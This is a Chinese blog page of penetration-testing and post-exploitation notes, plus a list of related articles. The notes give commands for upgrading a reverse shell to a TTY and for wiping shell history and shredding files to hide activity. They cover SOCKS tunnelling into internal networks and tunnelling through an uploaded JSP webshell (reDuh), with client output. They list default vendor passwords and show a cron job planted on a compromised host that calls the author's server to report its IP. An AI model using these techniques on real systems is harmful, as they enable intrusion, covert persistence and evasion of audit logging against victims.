python写的网址渗透_python下的内网渗透笔记

最新推荐文章于 2023-10-17 15:08:27 发布
最新推荐文章于 2023-10-17 15:08:27 发布
阅读量800 收藏
点赞数
文章标签: python写的网址渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30609253/article/details/113506313
版权

用nst的反弹后门连上nc后不能su交互,报错如下:

standard in must be a tty

解决方法:

python -c ‘import pty; pty.spawn(“/bin/sh”)’

得到shell就可以su进行交互了。

ps:最近渗透测试中遇到的几个值得注意的情况,记录下:

1.history不记录:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

2.history

n   :数字,意思是‘要列出最近的 n 笔命令列表’的意思!

-c  :将目前的 shell 中的所有 history 内容全部消除

-a  :将目前新增的 history 指令新增入 histfiles 中,若没有加 histfiles ,

则预设写入 ~/.bash_history

-r  :将 histfiles 的内容读到目前这个 shell 的 history 记忆中;

-w  :将目前的 history 记忆内容写入 histfiles 中!

3.正确的删除文件做法是用shred

shred -n 31337 -z -u file_to_delete

4.内网ssh映射

可以用ssh隧道代理的方式访问:plink root@公网ip -D 127.0.0.1:8080 然后ie代理socks5代理设置为127.0.0.1:8080就可以访问内网了:http://192.168.0.1

5.改了一个c++写的端口映射的工具proxy,2个版本,一个是加参数的。另一个改的读取配置文件的。源码以后公布(源码见下面回复)。

/usr/local/bin/proxy 2080 192.168.0.7 80 把0.7的80端口映射到本机的2080端口。

6.Windows下SuperO Doctor III管理后台,可用VNC:(超微主板带的管理工具,有点类似IPMI之类的)

值得注意的是,由于SuperO Doctor III分別采用到Xitami web server、TridiaVNC、SndMail 2.1以及WMI(Windows Management Instrumentation) Core 1.5,所以必须使用不同的帐号密码才能进行设置上的修改。系統登录以及Xitami web server预设默认帐号密码是ADMIN/ADMIN,而TridiaVNC密码则是abcde,而非Windows系統管理员的帐号。

7.Welcome to EIS System!

改设备的默认Telnet用户名和密码是admin/admin

8.reDuh,一个不错的工具,可以映射内网端口到http或https端口的http服务上:

服务端有aps、jsp、php版,具体下载:http://www.sensepost.com/research/reDuh。下面简单说下这个工具

先在服务器上传服务端:访问http://www.xxx.com/shell/reduh.jsp如下:

[reDuhError]Undefined Request

说明工作正常。在本地:

D:\Tools\reDuh\0.2\reDuhClient>java reDuhClient www.xxx.com 80 /shell/reduh.jsp

[Info]Querying remote JSP for usable remote RPC port

[Info]Remote RPC port chosen as 42001

[Info]Attempting to start reDuh.jsp from www.xxx.com:80/shell/reduh.jsp and set

ting remote RPC port to 42001. Please wait…

[InfoL]reDuhClient service listener started on local port 1010

[InfoL]Caught new service connection on port 1010

本地默认监听1010端口:

D:\Tools>nc -vv 127.0.0.1 1010

DNS fwd/rev mismatch: localhost != vitter

localhost [127.0.0.1] 1010 (?) open

Welcome to the reDuh command line

>>[createTunnel]5900:192.168.0.3:5900

Successfully bound locally to port 5900. Awaiting connections.

出现这个提示就ok了,[createTunnel]本地映射出的端口:被映射的内网ip:被映射的内网ip端口

然后就可以用vnc连接127.0.0.1的5900端口就是连攻击内网的192.168.0.3的服务器了。

9.对于ip不固定的怎么确认ip:

我的做法是在被攻击机器上crond里面跑一个脚本定时访问我写的一个jsp文件。

[root@cactiez etc]# cat /etc/cron.hourly/curl

#!/bin/sh

/usr/bin/curl http://xxx.xxx.com/ip/getip.jsp

该jsp代码如下:

—————————-代码开始分割线—————————–

BugMarker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python网站渗透测试
12-10
Welcome to our book on Python and web application testing. Penetration testing is a massive field and the realms of Python are even bigger. We hope that our little book can help you make these enormous fields a little more manageable. If you're a Python guru, you can look for ideas to apply your craft to penetration testing, or if you are a newbie Pythonist with some penetration testing chops, then you're in luck, this book is also for you.
python脚本实现内网渗透——web资产IP以及常用扫描
qq_39330735的博客
02-02 497
【代码】python脚本,扫描局域网内主机的可能存在的web应用及端口。
[渗透测试]python内网渗透信息收集脚本
WHACKW的专栏
06-09 973
渗透测试从互联网找到了入侵内网的入口点之后剩下的就内网渗透测试了。       有人说到了内网还不容易,随便拿个hscan一抓一大把弱口令。我同意这个看法,但是在我看来,内网环境复杂得多,要想精确获取自己想要的目标,要处理的内容要多得多,只有获得了必要的信息,才有的抓的目标,我认为一般内网环境中的渗透测试最难和最重要的是精确的信息收集,剩下的自然可以顺理成章的进行常规的漏洞扫描和利用。如果有
python渗透攻击
weixin_50699777的博客
04-01 5749
文章目录前言一、拒绝服务攻击1.含义2.数据链路层的拒绝服务攻击3.网络层的拒绝服务攻击4.传输层的拒绝服务攻击5.应用层的拒绝服务攻击二、身份认证攻击1.简单网络服务攻击的认证2.破解密码字典3.FTP暴力破解模块三、网络嗅探与欺骗1.网络数据嗅探2.ARP的原理与缺陷 前言 这是Python渗透测试编程技术,基于python模块是实现的 一、拒绝服务攻击 1.含义 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。 拒绝服务攻击并不是一个攻击方式,而是一类具有相似特征的攻击
Python课堂笔记.rar_python_python_神经网络_编程
07-15
python编程学习,手数据结构和算法、手神经网络项目。接触高深的底层知识、神经网络底层实现的知识
python核心笔记_python核心笔记_python_
09-29
python数据分析,适用于初学的同学,谢谢大家,加油!
读书笔记python渗透测试.docx
最新发布
04-13
读书笔记python渗透测试.docx
python核心笔记_python核心笔记_
09-29
python核心笔记,主要介绍了重点内容,易错点
python网络渗透_Python内网渗透扫描器Ladon
weixin_39637386的博客
12-06 207
Ladon Scanner For Python PyLadon目前python版功能较少,无论在Windows还是Linux系统性能以及速度均也比不上Ladon.exe唯一的优点是跨平台,后续会添加相关功能,缺点也明显py打包程序很大,不太适合在目标使用程序简介Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetS...
Python安全攻防之第一章渗透测试概述
shy的博客
02-07 647
Python安全攻防 渗透测试指南之第一章渗透测试概述
python渗透编程之道
OldBowl
05-08 2271
1、学python 2、网络知识 3、渗透知识
Python黑帽编程指南:网络攻防与渗透测试Python游戏开发实践
吃不胖.
10-17 78
本书“Python黑帽编程指南:网络攻防与渗透测试”是一本介绍Python在网络攻防方面的应用和实践的书籍,篇幅较短,但内容非常实用。本书“Python游戏开发实践”就是一本介绍Python在游戏开发中的应用和实践的书籍。Pygame是Python中一个非常流行的游戏开发库,本书介绍了Pygame的基本概念和使用方法,以及如何使用Pygame创建2D游戏。本书还给出了一些游戏开发的具体实例,例如飞机大战、2048小游戏等,通过这些实例可以更好地了解Python在游戏开发中的应用。Python游戏开发实践。
网络安全攻防渗透测试之python开发
weixin_46626737的博客
06-30 442
xpath爬虫爬取网页信息,筛选,http头部,保存数据到文件中,结合漏洞检测使用。Ⅲ.pocsuit引入poc/exp脚本:(漏扫框架二次开发)根据socket请求返回值来判断端口是否开放。用nslookup+域名来判断是否有cdn。二次开发,修改脚本-根据输入的参数对应文件和函数。利用字典循环,抛出异常,利用ping。普通request请求加上poc测试请求。使用第三方库nmap。使用第三方库nmap。使用第三方库nmap。③启动对应ID的扫描任务。④获取对应ID的扫描状态。
内网横向渗透
weixin_58782362的博客
09-28 453
因为在目标主机上面上传套件在实战中不实用,可能照成数据包丢失,也可能被查杀,也有可能目标主机没有相对的语言解析,所以最好的办法就是直接使用代理。建立ipc链接到目标主机--拷贝要执行的命令脚本到目标主机--查看目标时间、创建计划任务定时执行拷贝到的脚本--删除ipc链接。外部:(交互式,外人开发工具),本地使用./administartor,域主机使用god/administartor。下载对应release,建立socks连接,设置socks代理,配置规则,调用!内部:(交互式windows官方工具)
渗透测试]python内网渗透信息收集脚本
WHACKW的专栏
06-09 1590
http://www.2cto.com/Article/201408/322754.html
渗透测试之内网渗透(二):内网穿透
m0_74131821的博客
04-24 2388
本文将从内网穿透的原理开始探讨,根据不同的内网出网入网情况,灵活设计对应的内网穿透方案
渗透测试之内网渗透学习
2201_75571291的博客
06-22 1777
渗透测试之内网渗透学习
python内网渗透
10-24
Python内网渗透是指利用Python的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内网中的敏感信息或者控制内网主机的过程。常用的Python内网渗透工具有reGeorgSocksProxy、ABPTTS等。其中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值